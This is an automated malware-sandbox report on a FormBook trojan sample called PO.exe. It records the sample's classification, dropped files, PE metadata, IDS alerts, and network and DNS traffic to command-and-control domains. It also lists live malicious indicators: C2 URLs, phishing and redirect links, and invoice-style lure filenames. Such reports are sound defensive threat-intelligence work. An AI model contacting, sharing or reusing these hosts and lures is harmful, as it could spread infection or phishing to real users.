Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: PO.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@5/5
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 127
• Number of non-executed functions: 310
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 2.19.106.160, 172.202.163.200, 13.107.253.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target vfAu7gBmmnuGpQ5Y.exe, PID 3220 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
Time | Type | Description
12:51:40 | API Interceptor | 1x Sleep call for process: PO.exe modified
12:53:08 | API Interceptor | 337498x Sleep call for process: net.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
192.64.118.221 | QCX ender user 2025.exe | Get hash | malicious | FormBook | Browse | www.topked.top/g9qz/
192.64.118.221 | Updated 2025 Trading Agreement for Direct Purchase.exe | Get hash | malicious | FormBook | Browse | www.nexave.live/g9oo/
192.64.118.221 | Documents.exe | Get hash | malicious | FormBook | Browse | www.smartath.site/gn2m/
192.64.118.221 | SOA - Final Payment.exe | Get hash | malicious | FormBook | Browse | www.topked.top/g9qz/
192.64.118.221 | swift copy.exe | Get hash | malicious | FormBook | Browse | www.vibrantoul.life/pp15/
192.64.118.221 | SOA-CAVER.exe | Get hash | malicious | FormBook | Browse | www.topked.top/g9qz/
192.64.118.221 | PO 564787YTSH.exe | Get hash | malicious | FormBook | Browse | www.infiniteture.xyz/9s0n/?AvfPLv6=bqDLOh3QLnlqS3shfAx8tJAVyKUjgMknIYXastOCZKWE7q0ObDVixEYWAoa36VYY3prSZOqwe0tPcZBTiAcAMWicaVPwa7FZ9Dtcs8QoD+KUrgNbTA==&uF=ithpsd
192.64.118.221 | order confirmation.exe | Get hash | malicious | FormBook | Browse | www.vibrantoul.life/pp15/
192.64.118.221 | Updated Price List for 2025 Business Year.exe | Get hash | malicious | FormBook | Browse | www.nexave.live/g9oo/
192.64.118.221 | PO#910663595.exe | Get hash | malicious | FormBook | Browse | www.trueessence.site/bnc8/
13.248.169.48 | SOA - Final Payment.exe | Get hash | malicious | FormBook | Browse | www.physicsbrain.xyz/i9o2/?4J=eeVMOLNT7Wv5dPd1V7fF3d7wbVEZ0Ymjpf1j0+DhWbaaRP3NDl28Px2LHOiznaPSxG5Xa8rlCZjeYW1RU+5lsp5mJoJ4HYPoeUMJkyf7J+YlHSS38A==&pd=qdUp
13.248.169.48 | BINATONE LLC RFQ.Vbs.vbs | Get hash | malicious | FormBook | Browse | www.meacci.xyz/ieqn/
13.248.169.48 | REVISED PROFORMA INVOICE.exe | Get hash | malicious | FormBook | Browse | www.gnolls.xyz/d6sm/
13.248.169.48 | JJ0tnjLiDS.exe | Get hash | malicious | FormBook | Browse | www.bitcoinvendor.xyz/1lt7/
13.248.169.48 | QCX ender user 2025.exe | Get hash | malicious | FormBook | Browse | www.autonomousrich.xyz/5l58/
13.248.169.48 | crypt.exe | Get hash | malicious | FormBook | Browse | www.brothersharetender.xyz/rbx9/
13.248.169.48 | Purchase Order No. STPL014724.exe | Get hash | malicious | FormBook | Browse | www.prepaidbitcoin.xyz/yz57/
13.248.169.48 | Updated 2025 Trading Agreement for Direct Purchase.exe | Get hash | malicious | FormBook | Browse | www.shibbets.xyz/r026/
13.248.169.48 | Confirmation Receipt for ETF_20250211_HSBCEU314AX51920DEU.vbe | Get hash | malicious | FormBook | Browse | www.hotethereum.xyz/t7vo/
13.248.169.48 | 06OJsSI8WG.exe | Get hash | malicious | FormBook | Browse | www.satoshichecker.xyz/2inw/
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.fineitemrealm.shop | 2363104503_4202741358 - QUOTE-.exe | Get hash | malicious | FormBook | Browse | 162.210.195.109
www.fineitemrealm.shop | PO-000001405.exe | Get hash | malicious | FormBook | Browse | 162.210.195.109
www.fineitemrealm.shop | Purchase Order.hta | Get hash | malicious | FormBook | Browse | 162.210.195.109
www.fineitemrealm.shop | pappy.ps1 | Get hash | malicious | FormBook | Browse | 162.210.195.109
www.fineitemrealm.shop | em3.ps1 | Get hash | malicious | FormBook | Browse | 162.210.195.109
www.erectus.xyz | swift copy.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.erectus.xyz | order confirmation.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.erectus.xyz | BJKzw4jO7c.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.erectus.xyz | 8BU0MOmoNl.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.erectus.xyz | Gd3lOevK672JYIK.zip.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.erectus.xyz | SOA.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.erectus.xyz | PURCHASE ORDER 199202509..exe | Get hash | malicious | FormBook, PureLog Stealer | Browse | 13.248.169.48
www.erectus.xyz | PURCHASE ORDER 199202509.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.erectus.xyz | Pre-alert documents.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.erectus.xyz | Z-91007848.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
www.adjokctp.icu | Purchase Inquiry.exe | Get hash | malicious | FormBook | Browse | 104.21.35.208
www.adjokctp.icu | BJKzw4jO7c.exe | Get hash | malicious | FormBook | Browse | 104.21.35.208
www.adjokctp.icu | 8BU0MOmoNl.exe | Get hash | malicious | FormBook | Browse | 104.21.35.208
www.adjokctp.icu | SecuriteInfo.com.W32.Trojan.CTLU-0946.13292.12624.exe | Get hash | malicious | FormBook, GuLoader | Browse | 104.21.35.208
www.adjokctp.icu | Gd3lOevK672JYIK.zip.exe | Get hash | malicious | FormBook | Browse | 172.67.179.147
www.adjokctp.icu | Pre-alert documents.exe | Get hash | malicious | FormBook | Browse | 104.21.35.208
www.adjokctp.icu | Contract-pdf.bat.exe | Get hash | malicious | FormBook, GuLoader | Browse | 104.21.35.208
www.adjokctp.icu | SWIFT COPY.exe | Get hash | malicious | FormBook | Browse | 104.21.35.208
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AMAZON-02US | SOA - Final Payment.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
AMAZON-02US | BINATONE LLC RFQ.Vbs.vbs | Get hash | malicious | FormBook | Browse | 13.248.169.48
AMAZON-02US | http://d1xkzbyjtghizd.cloudfront.net | Get hash | malicious | Unknown | Browse | 18.245.78.138
AMAZON-02US | REVISED PROFORMA INVOICE.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
AMAZON-02US | JJ0tnjLiDS.exe | Get hash | malicious | FormBook | Browse | 13.248.169.48
AMAZON-02US | https://tsa.formaloo.co/pv4hi3 | Get hash | malicious | HTMLPhisher | Browse | 54.231.128.248
AMAZON-02US | https://click.mailchimp.com/track/click/30010842/forms.office.com?p=eyJzIjoiUU5MTE43blNUdEQxbUdOR3lwdVJ3M1kyVHBzIiwidiI6MSwicCI6IntcInVcIjozMDAxMDg0MixcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL2Zvcm1zLm9mZmljZS5jb21cXFwvUGFnZXNcXFwvU2hhcmVGb3JtUGFnZS5hc3B4P2lkPWkwYWxtWEtzYWtDTnNoUThad2JsWnVHaXRELXJkRk5MbngxZkVDU0RBUGRVT1VWWE9WSTJUa0ZNVFRaSU1EUldUa2RZVmtWSlEwczBVUzR1JnNoYXJldG9rZW49cWhZMVVQRWtyM0NGdjJpcUlpTUtcIixcImlkXCI6XCIzYjUxMDE1ZDY0ODc0ZDdkOWMwNjg2OGM5Y2M5OWVjOFwiLFwidXJsX2lkc1wiOltcIjVkMTg5YTdhMzU1NWIyZWQ5ZjBlNmQ4ZTM3MWFjZmM1ZDE4NzMwYmRcIl19In0 | Get hash | malicious | HTMLPhisher | Browse | 76.223.125.47
AMAZON-02US | kHWCtJ64Z2.elf | Get hash | malicious | Available For Trial | Browse | 54.171.230.55
AMAZON-02US | Owari.mips.elf | Get hash | malicious | Unknown | Browse | 108.150.151.189
AMAZON-02US | https://r.bgroupusportugal.pt/redirect.php?disp=morta_ans11_10-02_20_50000&idc=1&email=uuser@wpb.org&mode=resetPassword&oobCode=fA9TMT-qLiJF54BFl3bAmwEgjXEBn69dwNFjpDzVlzcAAAGU8a8rwg&apiKey=AIzaSyD3eywpo5yGXrXV5Eo__cDlhXtgd0VYeNc&lang=en | Get hash | malicious | Unknown | Browse | 52.49.16.156
CLOUDFLARENETUS | SWIFT COPY.xls | Get hash | malicious | Unknown | Browse | 172.67.137.112
CLOUDFLARENETUS | ordin de plat#U0103.docx.doc | Get hash | malicious | Unknown | Browse | 104.21.78.201
CLOUDFLARENETUS | InvNo.248770.xls | Get hash | malicious | Unknown | Browse | 104.21.78.201
CLOUDFLARENETUS | Skramlekassens.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.48.1
CLOUDFLARENETUS | #U0395#U03a1#U0395#U03a5#U039d#U0391.xls | Get hash | malicious | Unknown | Browse | 104.21.78.201
CLOUDFLARENETUS | TT COPY.xls | Get hash | malicious | Unknown | Browse | 104.21.78.201
CLOUDFLARENETUS | Quotation.xls | Get hash | malicious | Unknown | Browse | 104.21.24.153
CLOUDFLARENETUS | ordin de plat#U0103.docx.doc | Get hash | malicious | Unknown | Browse | 172.67.137.112
CLOUDFLARENETUS | SWIFT COPY.xls | Get hash | malicious | Unknown | Browse | 172.67.137.112
CLOUDFLARENETUS | InvNo.248770.xls | Get hash | malicious | Unknown | Browse | 172.67.137.112
NAMECHEAP-NETUS | https://www.yougottabenotseriousbecause.com/wIcRm6C | Get hash | malicious | HTMLPhisher | Browse | 162.0.236.189
NAMECHEAP-NETUS | QCX ender user 2025.exe | Get hash | malicious | FormBook | Browse | 192.64.118.221
NAMECHEAP-NETUS | Updated 2025 Trading Agreement for Direct Purchase.exe | Get hash | malicious | FormBook | Browse | 192.64.118.221
NAMECHEAP-NETUS | Confirmation Receipt for ETF_20250211_HSBCEU314AX51920DEU.vbe | Get hash | malicious | FormBook | Browse | 198.187.31.216
NAMECHEAP-NETUS | 06OJsSI8WG.exe | Get hash | malicious | FormBook | Browse | 63.250.47.57
NAMECHEAP-NETUS | HSBC SLIP.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 199.188.200.194
NAMECHEAP-NETUS | Documents.exe | Get hash | malicious | FormBook | Browse | 192.64.118.221
NAMECHEAP-NETUS | SOA - Final Payment.exe | Get hash | malicious | FormBook | Browse | 192.64.118.221
NAMECHEAP-NETUS | swift copy.exe | Get hash | malicious | FormBook | Browse | 192.64.118.221
NAMECHEAP-NETUS | SOA-CAVER.exe | Get hash | malicious | FormBook | Browse | 192.64.118.221
No context
No context
Process: C:\Users\user\Desktop\PO.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\net.exe
File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category: dropped
Size (bytes): 114688
Entropy (8bit): 0.9746603542602881
Encrypted: false
SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5: 780853CDDEAEE8DE70F28A4B255A600B
SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious: false
Reputation: high, very likely benign file
Preview: SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                              Entropy (8bit):7.766938336164845
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: PO.exe
File size: 781'824 bytes
MD5: 351a691669abf4dcbdb3f393b2f3e183
SHA1: c6a72eb864082996d4673185fe89bf45ebea6f7b
SHA256: 7b6dbf313708726318645aa72ecabe962572e8008214dffab03c151012c2df68
SHA512: 23e307ca524bec81d109d814322dae14a1da4918d777606eed6081274a75d8a56becfb66bc521a8bda5b2388fe46de80dfc0c64301d7b9fde92ebbd634db174a
SSDEEP: 12288:IuIAbZWUBj736dxcddJJK3C6qS5LTVtevkqmlmNIyKbpvVOIArTEEP:IGbYUlS2T0C6qgev60NI1bvOIArT
TLSH: BCF4E1C43B36A70ADE5A6A30D635EEB452A81DACB100B9E75FDD3B57B8AC2105D0CF05
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g..............0.............r.... ........@.. .......................@............@................................
Icon Hash: bfdbd0a493925a25
Entrypoint: 0x4bee72
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67A981BF [Mon Feb 10 04:34:07 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (entrypoint disassembly)
jmp dword ptr [00402000h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbee20 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0x1864 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbce88 | 0xbd000 | 55d67767ca29158d0ecc94ecebec0ec1 | False | 0.9124775235615079 | data | 7.77210370453255 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc0000 | 0x1864 | 0x1a00 | 935c28d8b2965dbf478441da5e9300fb | False | 0.8152043269230769 | data | 7.201576384374057 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc2000 | 0xc | 0x200 | 1c32fd8789f538e496a6faa3a8236ee1 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc00c8 | 0x1468 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9529096477794793
RT_GROUP_ICON | 0xc1540 | 0x14 | data | | | 1.05
RT_VERSION | 0xc1564 | 0x2fc | data | | | 0.43848167539267013
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName |
FileDescription | MultipleForms
FileVersion | 3.0.0.0
InternalName | iJcB.exe
LegalCopyright |
LegalTrademarks |
OriginalFilename | iJcB.exe
ProductName | MultipleForms
ProductVersion | 3.0.0.0
Assembly Version | 4.0.0.0
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-02-11T18:53:42.065591+0100 | 2859622 | ETPRO EXPLOIT_KIT FoxTDS Initial Check | 1 | 104.21.35.208 | 80 | 192.168.2.4 | 50022 | TCP
2025-02-11T18:53:44.839098+0100 | 2859622 | ETPRO EXPLOIT_KIT FoxTDS Initial Check | 1 | 104.21.35.208 | 80 | 192.168.2.4 | 50023 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                              Feb 11, 2025 18:53:21.502214909 CET5001680192.168.2.4162.210.195.109
                                                                                              Feb 11, 2025 18:53:22.508692026 CET5001780192.168.2.4162.210.195.109
                                                                                              Feb 11, 2025 18:53:22.513484001 CET8050017162.210.195.109192.168.2.4
                                                                                              Feb 11, 2025 18:53:22.513576984 CET5001780192.168.2.4162.210.195.109
                                                                                              Feb 11, 2025 18:53:22.522701979 CET5001780192.168.2.4162.210.195.109
                                                                                              Feb 11, 2025 18:53:22.527493000 CET8050017162.210.195.109192.168.2.4
                                                                                              Feb 11, 2025 18:53:22.971740007 CET8050017162.210.195.109192.168.2.4
                                                                                              Feb 11, 2025 18:53:22.971755981 CET8050017162.210.195.109192.168.2.4
                                                                                              Feb 11, 2025 18:53:22.971823931 CET8050017162.210.195.109192.168.2.4
                                                                                              Feb 11, 2025 18:53:22.971940041 CET5001780192.168.2.4162.210.195.109
                                                                                              Feb 11, 2025 18:53:22.971980095 CET5001780192.168.2.4162.210.195.109
                                                                                              Feb 11, 2025 18:53:22.974879980 CET5001780192.168.2.4162.210.195.109
                                                                                              Feb 11, 2025 18:53:22.979671955 CET8050017162.210.195.109192.168.2.4
                                                                                              Feb 11, 2025 18:53:28.008791924 CET5001880192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:28.013665915 CET8050018192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:28.013761044 CET5001880192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:28.028462887 CET5001880192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:28.033277035 CET8050018192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:28.707705021 CET8050018192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:28.707729101 CET8050018192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:28.707797050 CET5001880192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:29.536638021 CET5001880192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:30.555618048 CET5001980192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:30.561355114 CET8050019192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:30.561455965 CET5001980192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:30.576513052 CET5001980192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:30.581253052 CET8050019192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:31.257075071 CET8050019192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:31.257328987 CET8050019192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:31.257374048 CET5001980192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:32.083501101 CET5001980192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:33.108398914 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:33.115326881 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.115472078 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:33.131406069 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:33.140554905 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140569925 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140574932 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140898943 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140908957 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140918016 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.140927076 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.142426968 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.142438889 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.928595066 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.928662062 CET8050020192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:33.928730965 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:34.646065950 CET5002080192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:35.665750027 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:35.670546055 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:35.670628071 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:35.679578066 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:35.684442043 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:36.310945988 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:36.310985088 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:36.311134100 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:36.314064026 CET5002180192.168.2.4192.64.118.221
                                                                                              Feb 11, 2025 18:53:36.318828106 CET8050021192.64.118.221192.168.2.4
                                                                                              Feb 11, 2025 18:53:41.390476942 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:41.395373106 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:41.397449017 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:41.637118101 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:41.644659996 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:42.064608097 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:42.064634085 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:42.064682007 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:42.065591097 CET8050022104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:42.065633059 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:43.161684990 CET5002280192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.180650949 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.185468912 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.185564995 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.200117111 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.204960108 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.837663889 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.837682962 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.837739944 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:44.839097977 CET8050023104.21.35.208192.168.2.4
                                                                                              Feb 11, 2025 18:53:44.839147091 CET5002380192.168.2.4104.21.35.208
                                                                                              Feb 11, 2025 18:53:46.115058899 CET5002380192.168.2.4104.21.35.208
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Feb 11, 2025 18:52:45.616561890 CET  60844        53         192.168.2.4  1.1.1.1
Feb 11, 2025 18:52:45.627818108 CET  53           60844      1.1.1.1      192.168.2.4
Feb 11, 2025 18:53:01.368763924 CET  58138        53         192.168.2.4  1.1.1.1
Feb 11, 2025 18:53:01.381980896 CET  53           58138      1.1.1.1      192.168.2.4
Feb 11, 2025 18:53:14.654772043 CET  61140        53         192.168.2.4  1.1.1.1
Feb 11, 2025 18:53:14.851650000 CET  53           61140      1.1.1.1      192.168.2.4
Feb 11, 2025 18:53:27.993551016 CET  55627        53         192.168.2.4  1.1.1.1
Feb 11, 2025 18:53:28.006263018 CET  53           55627      1.1.1.1      192.168.2.4
Feb 11, 2025 18:53:41.333745003 CET  51904        53         192.168.2.4  1.1.1.1
Feb 11, 2025 18:53:41.347964048 CET  53           51904      1.1.1.1      192.168.2.4
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                     Type            Class        DNS over HTTPS
Feb 11, 2025 18:52:45.616561890 CET  192.168.2.4  1.1.1.1  0x510d    Standard query (0)  www.cloud-kuprof2.click  A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:01.368763924 CET  192.168.2.4  1.1.1.1  0xc13b    Standard query (0)  www.erectus.xyz          A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:14.654772043 CET  192.168.2.4  1.1.1.1  0x50ff    Standard query (0)  www.fineitemrealm.shop   A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:27.993551016 CET  192.168.2.4  1.1.1.1  0x29e4    Standard query (0)  www.globalcase.website   A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:41.333745003 CET  192.168.2.4  1.1.1.1  0x504c    Standard query (0)  www.adjokctp.icu         A (IP address)  IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                     CName  Address          Type            Class        DNS over HTTPS
Feb 11, 2025 18:52:45.627818108 CET  1.1.1.1    192.168.2.4  0x510d    No error (0)  www.cloud-kuprof2.click         57.129.59.27     A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:01.381980896 CET  1.1.1.1    192.168.2.4  0xc13b    No error (0)  www.erectus.xyz                 13.248.169.48    A (IP address)  IN (0x0001)  false
Feb 11, 2025 18:53:01.381980896 CET  1.1.1.1    192.168.2.4  0xc13b    No error (0)  www.erectus.xyz                 76.223.54.146    A (IP address)  IN (0x0001)  false
